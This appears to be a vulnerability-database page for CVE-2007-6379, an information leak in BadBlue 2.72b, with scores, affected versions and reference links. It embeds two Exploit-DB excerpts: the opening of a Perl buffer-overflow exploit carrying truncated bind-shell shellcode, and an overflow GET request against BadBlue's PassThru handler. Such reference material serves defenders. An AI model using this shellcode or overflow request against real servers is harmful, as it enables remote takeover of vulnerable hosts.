CVE-2007-6379
published 2007-12-15CVE-2007-6379: BadBlue 2.72b and earlier allows remote attackers to obtain sensitive information via an invalid browse parameter, which reveals the installation path in an…
PriorityP412medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.28%
86.9th percentile
BadBlue 2.72b and earlier allows remote attackers to obtain sensitive information via an invalid browse parameter, which reveals the installation path in an error message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| badblue | badblue | <= 2.72b | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BadBlue 2.72 - PassThru Remote Buffer Overflow
exploitdb·2007-12-24·CVSS 5.0
CVE-2007-6377 [MEDIUM] BadBlue 2.72 - PassThru Remote Buffer Overflow
BadBlue 2.72 - PassThru Remote Buffer Overflow
---
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# https://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# exploit for stack overflow in badblue 2.72
#
# Credit to Luigi Auriemma
# Jacopo Cervini [email protected]
# 22/12/2007
#
#
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: badblue-272-seh.pl \n\n";
exit;
}
# metasploit win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\
Exploit-DB
BadBlue 2.72b - Multiple Vulnerabilities
exploitdb·2007-12-10
CVE-2007-6379 BadBlue 2.72b - Multiple Vulnerabilities
BadBlue 2.72b - Multiple Vulnerabilities
---
#######################################################################
Luigi Auriemma
Application: BadBlue
http://www.badblue.com
Versions: badbluebof.txt
GET /ext.dll?mfcisapicommand=PassThru&aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/badblue-adv.txthttp://osvdb.org/42418http://secunia.com/advisories/28031http://securityreason.com/securityalert/3448http://www.securityfocus.com/archive/1/484834/100/0/threadedhttp://www.securityfocus.com/bid/26803http://www.vupen.com/english/advisories/2007/4160http://aluigi.altervista.org/adv/badblue-adv.txthttp://osvdb.org/42418http://secunia.com/advisories/28031http://securityreason.com/securityalert/3448http://www.securityfocus.com/archive/1/484834/100/0/threadedhttp://www.securityfocus.com/bid/26803http://www.vupen.com/english/advisories/2007/4160
2007-12-15
Published